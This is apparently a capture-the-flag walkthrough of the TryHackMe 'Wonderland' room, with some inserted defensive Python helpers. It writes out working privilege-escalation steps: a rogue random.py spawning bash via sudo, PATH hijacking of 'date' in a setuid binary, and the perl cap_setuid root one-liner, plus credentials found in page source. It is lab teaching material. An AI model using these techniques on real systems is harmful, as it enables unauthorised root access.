[THM] [Medium] Wonderland

This guide describes the process of completing the Wonderland room on the TryHackMe platform. We will go through the usual stages: scanning, exploitation, and privilege escalation. Following the White Rabbit, we will immerse ourselves in Wonderland and obtain root access to the target machine.

Reconnaissance

The reconnaissance phase is omitted because nothing of note was found on the room's page. Let's move straight to the scanning stage.

Scanning

1. Nmap

Nmap was used to scan the target and identify open ports and services. It also reports service versions and, through its scripts, some configuration details.

We use the command:

nmap -sC -sV target_ip

Explanation of flags:

  • -sC: runs the default set of Nmap scripts, equivalent to --script=default. These scripts perform basic checks and collect additional information about each service.

  • -sV: enables service version detection. Nmap will try to determine the versions of the services running on the open ports.

Scan results:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-03 18:39 MSK
Nmap scan report for target_ip
Host is up (0.066s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.94 seconds

The scan showed the presence of an SSH server on port 22 and a web server on port 80.

DirBuster was used to search for hidden directories and files on the web server.

dirbuster -u http://target_ip -l /usr/share/wordlists/dirb/big.txt

Let's start scanning directories on the site. Note the unusual scan result:

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing

Dir found: / - 200
Dir found: /img/ - 200
Dir found: /r/ - 200
Dir found: /r/a/ - 200
Dir found: /r/a/b/ - 200
Dir found: /r/a/b/b/ - 200
Dir found: /r/a/b/b/i/ - 200
Dir found: /r/a/b/b/i/t/ - 200

Let's follow the links, one directory at a time.

The room description said to follow the rabbit, so we keep exploring the directories down to /r/a/b/b/i/t/. After examining the source code of that page, we discover a hidden message:

<!DOCTYPE html>

<head>
    <title>Enter wonderland</title>
    <link rel="stylesheet" type="text/css" href="/main.css">
</head>

<body>
    <h1>Open the door and enter wonderland</h1>
    <p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
    <p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
    </p>
    <p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
        the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
    <p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
    <img src="/img/alice_door.png" style="height: 50rem;">
</body>

In addition to the quote from the fairy tale, there is a hidden paragraph containing alice:HowDothTheLittleCrocodileImproveHisShiningTail

This looks like a username and password, most likely SSH credentials.

Gaining access

We use the found credentials to log into the target machine via SSH:

ssh alice@target_ip

alice@wonderland:~$ # We have access to the host!!!!

After logging into the target machine as user alice, the first step is to explore the system for interesting files and directories.

>> ls -la
drwxr-xr-x 5 alice alice 4096 May 25  2020 .
drwxr-xr-x 6 root  root  4096 May 25  2020 ..
lrwxrwxrwx 1 root  root     9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice  220 May 25  2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25  2020 .bashrc
drwx------ 2 alice alice 4096 May 25  2020 .cache
drwx------ 3 alice alice 4096 May 25  2020 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25  2020 .local
-rw-r--r-- 1 alice alice  807 May 25  2020 .profile
-rw------- 1 root  root    66 May 25  2020 root.txt
-rw-r--r-- 1 root  root  3577 May 25  2020 walrus_and_the_carpenter.py

We found two interesting files: root.txt and walrus_and_the_carpenter.py.

Note the owner of both files: it is root. For root.txt only the owner can read the file, while the second file is readable by everyone.

Perhaps this is a good place for a short primer on file permissions, the string of characters at the beginning of each line, which is what chmod sets.

This string encodes the rights a particular user has when interacting with a file. There are three possible actions, each with a numeric value:

  • execute: 1

  • write: 2

  • read: 4

By adding up the numbers you can determine what rights apply to the file. For example, 1 + 2 = 3 gives execute and write rights. The rights are set separately for three classes of users: the owner (USER), the owner's group (GROUP), and everyone else (OTHER).

For each class the digits are summed, and the file's rights are written as a three-digit number, for example 755:

  • USER 7 = 1 + 2 + 4 (execute + write + read)

  • GROUP 5 = 1 + 4 (execute + read)

  • OTHER 5 = 1 + 4 (execute + read)

These same rights can also be written symbolically, which is the form ls shows: 755 corresponds to rwxr-xr-x, and the leading character gives the file type (- for a regular file, d for a directory, l for a symbolic link).
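As an added worked example (not part of the original article), here is a small Python module that converts the mode column of ls -l, including the s and t bits that appear later on teaParty, into the numeric and per-class forms described above, and notes what a reviewer should take from such a line:

```python
import stat

ROLES = ("user", "group", "other")

def parse_ls_mode(field):
    """Turn the 10-character mode column of ls -l into a numeric st_mode.
    '-rw-r--r--' -> 0o644, '-rwsr-sr-x' (teaParty) -> 0o6755."""
    if len(field) != 10:
        raise ValueError("expected 10 characters such as -rw-r--r--")
    mode = 0
    for i, role in enumerate(ROLES):
        r, w, x = field[1 + 3 * i: 4 + 3 * i]
        digit = (4 if r == "r" else 0) + (2 if w == "w" else 0)
        if x in "xst":                       # lower-case letter: execute bit is set
            digit += 1
        if x in "sS" and role == "user":     # setuid shows in the user slot
            mode |= stat.S_ISUID
        elif x in "sS" and role == "group":  # setgid shows in the group slot
            mode |= stat.S_ISGID
        elif x in "tT" and role == "other":  # sticky bit shows in the other slot
            mode |= stat.S_ISVTX
        mode |= digit << (6 - 3 * i)
    return mode

def octal(field):
    """The three- or four-digit form used with chmod, e.g. '755' or '6755'."""
    return format(parse_ls_mode(field), "o")

def rights(field):
    """Per-class actions: the readable form of the digits above."""
    mode = parse_ls_mode(field)
    return {role: [name for bit, name in ((4, "read"), (2, "write"), (1, "execute"))
                   if (mode >> (6 - 3 * i)) & bit]
            for i, role in enumerate(ROLES)}

def review(field, owner):
    """What a reviewer of an ls -l line should notice about a file."""
    mode, notes = parse_ls_mode(field), []
    if mode & stat.S_ISUID and owner == "root":
        notes.append("setuid root: runs with root's identity")
    if mode & stat.S_ISGID and field[0] != "d":
        notes.append("setgid: runs with the owning group's identity")
    if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
        notes.append("world-writable")
    return notes
```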

Let's return to the walkthrough. The file walrus_and_the_carpenter.py has the rights -rw-r--r--; we are interested in the last part, r--, which means that anyone in OTHER can read the file. The execute bit is not set, but since we are in alice's own home directory and the file is readable, we can still run it by passing it to the python interpreter, which only needs to read the file.

Let's look at the script with cat walrus_and_the_carpenter.py:

import random
poem = """The sun was shining on the sea,
Shining with all his might:
.
. POEM TEXT
.
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

The script picks random lines from the poem and prints them.

Well… Let's continue our search: go up to the /home directory and see what else is there.

>> ls -la ..
total 24
drwxr-xr-x  6 root      root      4096 May 25  2020 .
drwxr-xr-x 23 root      root      4096 May 25  2020 ..
drwxr-xr-x  5 alice     alice     4096 May 25  2020 alice
drwxr-x---  3 hatter    hatter    4096 May 25  2020 hatter
drwxr-x---  2 rabbit    rabbit    4096 May 25  2020 rabbit
drwxr-x---  6 tryhackme tryhackme 4096 May 25  2020 tryhackme

As you can see, there is plenty of interesting material, and we would like to see the contents of all the directories, but we do not have the rights.

Privilege escalation alice > rabbit

At this step it's worth looking at what sudo rights our alice has:

>> sudo -l -U alice
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

As you can see, we can run that script walrus_and_the_carpenter.py as the rabbit user. Overall, we have found a vector for further action.

Since we can have the script executed as rabbit, we need to somehow get code of our own into its execution. Note that the script imports the random library; Python finds that library by searching a list of directories on the host, in order.

Let's see where these files come from:

>> python3 -c 'import sys; print (sys.path)'
['', '/usr/lib/python36.zip', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages']

In general the output looks standard, but the first entry is the empty string, i.e. the current directory; when a script file is run instead of -c, the script's own directory takes that first slot. Either way, a directory under our control is searched before the system library directories.

What if we put our own random.py in the directory where the script lives and where we run it, /home/alice, which alice owns?

import os
os.system("/bin/bash")

This will launch a bash shell as rabbit.

Privilege escalation rabbit > hatter

Now let's look at rabbit's home directory; in it we see the binary file teaParty.

>> ls -la rabbit/
total 40
drwxr-x--- 2 rabbit rabbit  4096 May 25  2020 .
drwxr-xr-x 6 root   root    4096 May 25  2020 ..
lrwxrwxrwx 1 root   root       9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit   220 May 25  2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit  3771 May 25  2020 .bashrc
-rw-r--r-- 1 rabbit rabbit   807 May 25  2020 .profile
-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty

Using the netcat utility, we transfer this file to our local machine.

On the local machine:

nc -lvnp 7777 > teaParty

On the target host:

nc host-ip 7777 < teaParty

For decompiling we use Ghidra. This was new to me and I had not worked with this tool before, but after reading a couple of guides I was able to figure it out. After decompiling the teaParty file we are greeted by the Ghidra window. For those for whom Ghidra is also new, I'll briefly describe what is where:

  1. The central panel contains a disassembled binary file

  2. To the right of the central window, there is a decompiled representation of the function found in the binary (until we select the function we need, the window will be empty)

  3. On the left in the Symbol tree tab are the symbols found in the binary

In our case we are interested in the Functions folder in the Symbol Tree. Let's select the function we need and look at the Decompile window.

Let's pay attention to the highlighted line: in it the program prints date + 1. The real date binary lives in /bin/date, but the program calls it by its bare name, so it is looked up through the PATH variable. The story is similar to what we did when we replaced the random library with our own script, only now we need to substitute date so that the program uses our code.

Let's return to the attacked host. Creating our own date file in /bin is a difficult task (in fact impossible: we don't have the privileges for it). This can be circumvented by picking a directory in which we do have the rights to create files and putting it at the front of the PATH variable, before /bin:

export PATH=/tmp:$PATH

When the command is executed, the file in that directory will be found before the real one. Looking for such a directory at the root of the filesystem, the only option is /tmp, where we create our date. The script is almost identical to the previous one (remember to make it executable with chmod +x):

#!/bin/bash
/bin/bash

Let's run the teaParty script again.

>> ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ 
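As an added example (not the room's code), the following Python reproduces the lookup a bare command name goes through and audits a PATH for directories an unprivileged user can write to; the demo builds a throwaway /tmp-like directory in front of a /bin-like one, each holding a harmless date, rather than touching the real system.

```python
import os
import stat
import tempfile

def resolve(cmd, path_value):
    """First executable called cmd along path_value: what the shell (and
    therefore system() inside a program) does for a bare name such as 'date'."""
    for entry in path_value.split(os.pathsep):
        candidate = os.path.join(entry or ".", cmd)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None

def audit_path(path_value):
    """PATH entries an unprivileged user could populate: empty or relative
    entries, world-writable directories (sticky /tmp included, since anyone may
    still create new files there) and directories not owned by root."""
    issues = []
    for entry in path_value.split(os.pathsep):
        if not os.path.isabs(entry):
            issues.append((entry, "relative or empty entry"))
            continue
        try:
            st = os.stat(entry)
        except FileNotFoundError:
            continue
        if st.st_mode & stat.S_IWOTH:
            issues.append((entry, "world-writable"))
        elif st.st_uid != 0:
            issues.append((entry, "not owned by root"))
    return issues

def demo():
    """Constructed scenario: a /tmp-like directory in front of a /bin-like one,
    each holding a harmless 'date'; shows which copy wins and what the audit
    objects to."""
    with tempfile.TemporaryDirectory() as d:
        tmp_like, bin_like = os.path.join(d, "tmp"), os.path.join(d, "bin")
        os.mkdir(tmp_like)
        os.chmod(tmp_like, 0o1777)          # same mode as the real /tmp
        os.mkdir(bin_like)
        for directory in (tmp_like, bin_like):
            script = os.path.join(directory, "date")
            with open(script, "w") as f:
                f.write("#!/bin/sh\necho placeholder\n")
            os.chmod(script, 0o755)
        path_value = os.pathsep.join([tmp_like, bin_like])
        winner = resolve("date", path_value)
        return {"winner": os.path.basename(os.path.dirname(winner)),
                "flagged": [reason for _, reason in audit_path(path_value)]}
```

The same audit run over the real PATH of a setuid program explains why sudo's secure_path (shown in the sudo -l output above) is a fixed, root-owned list rather than whatever the caller exported.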

Escalation hatter > root

As you can see, everything went well and now we are acting on behalf of the hatter. Let's see what's in his directory.

>> ls -la
drwxr-x--- 3 hatter hatter 4096 May 25  2020 .
drwxr-xr-x 6 root   root   4096 May 25  2020 ..
lrwxrwxrwx 1 root   root      9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 hatter hatter  220 May 25  2020 .bash_logout
-rw-r--r-- 1 hatter hatter 3771 May 25  2020 .bashrc
drwxrwxr-x 3 hatter hatter 4096 May 25  2020 .local
-rw-r--r-- 1 hatter hatter  807 May 25  2020 .profile
-rw------- 1 hatter hatter   29 May 25  2020 password.txt

Of course, we are interested in the password.txt file.

cat password.txt 
WhyIsARavenLikeAWritingDesk?

Well, now is the time for LinEnum or similar tools that automatically look for unsafe settings on Unix-like systems. Previously I used netcat to transfer files; now, for a change, I suggest setting up an HTTP server.

On our machine we run python3 -m http.server, and on the attacked host we fetch the script with wget http://host-ip:8000/LinEnum.sh. Then we run it and look at the output:

./LinEnum.sh 

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################

# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled

Scan started at:
...

It turned out quite funny: by putting our date in /tmp we broke LinEnum's ability to display the scan start time (it calls date too), so let's delete the now-unnecessary file and restart LinEnum. The output is quite large, and I advise you to dig around and see what information about the system this script produces.

Examining the output, you can notice the following section:

[+] Files with POSIX capabilities set:
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

POSIX capabilities are a mechanism in Unix-like operating systems that allows certain privileged actions usually reserved for the superuser (root) to be delegated to ordinary users or processes.
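Added example, not from the article: a parser for getcap -r output (the format LinEnum prints above, plus the newer "path caps=flags" form) that flags binaries whose effective or permitted capabilities let them change identity; the sample lines are constructed from the three reported on this machine.

```python
import re

# Capabilities that by themselves let a process change identity or bypass file
# permission checks; a binary carrying one of them is effectively setuid root.
IDENTITY_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override",
                 "cap_dac_read_search", "cap_sys_admin"}

# One clause of the capability text format, e.g. cap_setuid+ep or cap_a,cap_b=eip
CLAUSE = re.compile(r"^([a-z0-9_,]+)([+=])([eip]*)$")

def parse_getcap(text):
    """Parse getcap -r output into {path: {capability: flags}}.
    Accepts the older 'path = caps' form shown on the page and the newer
    'path caps' form; flags are e=effective, p=permitted, i=inheritable."""
    result = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, rest = line.partition(" ")
        caps = {}
        for clause in rest.lstrip("= ").split():
            m = CLAUSE.match(clause)
            if not m:                 # a '-' clause only removes flags; ignore it
                continue
            for name in m.group(1).split(","):
                caps[name] = m.group(3)
        result[path] = caps
    return result

def identity_risks(text):
    """(path, capability) pairs whose flags let the binary become another user."""
    hits = []
    for path, caps in parse_getcap(text).items():
        for name, flags in caps.items():
            if name in IDENTITY_CAPS and ("e" in flags or "p" in flags):
                hits.append((path, name))
    return hits

# Constructed sample: the three lines LinEnum reported on this machine.
SAMPLE = """/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
"""
```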

Now let's consult GTFOBins. Quote:

“If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.”

We’ll use this, select the required payload for perl and launch it.

/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

The result of our actions:

# whoami
root
# 

Now let's read alice/root.txt:

cat alice/root.txt 
thm{***}

You probably have a question: where is the regular user flag? Well, at least this question arose for me; after sitting for another 30 minutes I finally decided to check the root directory, and, funnily enough, the flag is located there).

Thank you for reading to this point!) This is my first article on Habr and I will be very glad to receive any feedback!
